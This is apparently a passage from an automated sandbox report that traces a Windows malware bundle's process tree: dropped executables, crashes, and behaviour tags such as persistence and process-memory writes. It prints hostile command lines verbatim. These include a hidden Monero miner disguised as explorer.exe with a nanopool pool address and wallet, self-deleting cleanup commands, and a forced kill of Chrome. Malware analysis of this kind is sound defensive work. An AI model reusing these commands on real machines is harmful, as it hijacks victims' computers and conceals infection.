        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:5136
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:7320
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        
        PID:4268
        
        C:\Users\Admin\AppData\Roaming\8551329.exe
        
        "C:\Users\Admin\AppData\Roaming\8551329.exe"
        8⤵
        
        PID:5136
        
        C:\Users\Admin\AppData\Roaming\5986863.exe
        
        "C:\Users\Admin\AppData\Roaming\5986863.exe"
        8⤵
        
        PID:4308
        
        C:\Users\Admin\AppData\Roaming\5158395.exe
        
        "C:\Users\Admin\AppData\Roaming\5158395.exe"
        8⤵
        
        PID:5484
        
        C:\Users\Admin\AppData\Roaming\5664678.exe
        
        "C:\Users\Admin\AppData\Roaming\5664678.exe"
        8⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Roaming\2488891.exe
        
        "C:\Users\Admin\AppData\Roaming\2488891.exe"
        8⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 2036
        9⤵
        Program crash
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        
        PID:5888
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 788
        9⤵
        Program crash
        
        PID:5624
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 812
        9⤵
        Program crash
        
        PID:7580
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 568
        9⤵
        Program crash
        
        PID:7284
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 604
        9⤵
        Program crash
        
        PID:7328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 724
        9⤵
        Program crash
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        9⤵
        
        PID:8132
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8132 -s 324
        10⤵
        Program crash
        
        PID:8012
        
        C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"
        7⤵
        Executes dropped EXE
        
        PID:4780
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Alfanewfile2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe" & del C:\ProgramData\*.dll & exit
        8⤵
        
        PID:6900
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Alfanewfile2.exe /f
        9⤵
        Kills process with taskkill
        
        PID:6808
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:5180
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 800
        8⤵
        Program crash
        
        PID:5476
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 828
        8⤵
        Program crash
        
        PID:6012
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 860
        8⤵
        Program crash
        
        PID:5380
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 900
        8⤵
        Program crash
        
        PID:3172
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 972
        8⤵
        Program crash
        
        PID:4628
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 944
        8⤵
        Program crash
        
        PID:5912
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\is-QQEV7.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QQEV7.tmp\setup_2.tmp" /SL5="$201E8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        
        PID:5544
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        
        PID:5900
        
        C:\Users\Admin\AppData\Local\Temp\is-N3TET.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-N3TET.tmp\setup_2.tmp" /SL5="$401EE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        
        PID:6064
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        
        PID:5480
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        
        PID:5652
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        
        PID:5760
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1109eec571ac.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:776
    - - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue1109eec571ac.exe
        
        Tue1109eec571ac.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:4276
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 656
        6⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4312
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 672
        6⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4596
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 772
        6⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4744
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 820
        6⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:3592
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 856
        6⤵
        Program crash
        
        PID:5496
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 840
        6⤵
        Program crash
        
        PID:5888
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 1168
        6⤵
        Program crash
        
        PID:6128
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 1160
        6⤵
        Program crash
        
        PID:5928
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4100
    - - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11bc0507b56295.exe
        
        Tue11bc0507b56295.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:4368
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4116
    - - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        Tue11e4e580f2e8141a3.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4428
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4748
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4924
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:3504
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4792
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:3776
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:3160
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1760
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5516
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6108
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5780
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5648
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5600
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4212
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6388
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6720
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6276
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6584
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1452
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4352
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4848
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7528
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8188
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4720
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7760
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8116
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6492
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3076
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8052
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8088
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7116
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7948
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1360
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5596
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8612
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7612
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7372
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8772
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6872
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7964
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4996
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8768
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7424
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5484
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6820
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5608
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5244
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4260
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9100
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8320
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6748
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5624
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4708
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6896
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5636
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5328
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7124
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5600
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5380
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3960
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9200
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9208
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7660
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7988
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5820
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5700
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2244
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4732
      - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8108
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue118f55232e4.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4172
    - - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue118f55232e4.exe
        
        Tue118f55232e4.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4400
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:6972
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:7056
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4196
    - - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue112c483dd3245d.exe
        
        Tue112c483dd3245d.exe
        5⤵
        Executes dropped EXE
        
        PID:4444
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 1168
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:928
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4140
    - - C:\Users\Admin\AppData\Local\Temp\7zS84DAE3C3\Tue11141271fbe5877f.exe
        
        Tue11141271fbe5877f.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4304
      - C:\ProgramData\8227309.exe
        
        "C:\ProgramData\8227309.exe"
        6⤵
        
        PID:4440
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4440 -s 1980
        7⤵
        Program crash
        
        PID:4892
      - C:\ProgramData\1065150.exe
        
        "C:\ProgramData\1065150.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4812
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        
        PID:5292
      - C:\ProgramData\6529512.exe
        
        "C:\ProgramData\6529512.exe"
        6⤵
        
        PID:5320
      - C:\ProgramData\1017031.exe
        
        "C:\ProgramData\1017031.exe"
        6⤵
        
        PID:5952
      - C:\ProgramData\8956710.exe
        
        "C:\ProgramData\8956710.exe"
        6⤵
        
        PID:6120
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 552
      4⤵
      Program crash
      Suspicious use of AdjustPrivilegeToken
      PID:4992

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
- Executes dropped EXE
PID:4436
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5072

C:\Windows\system32\rundll32.exe
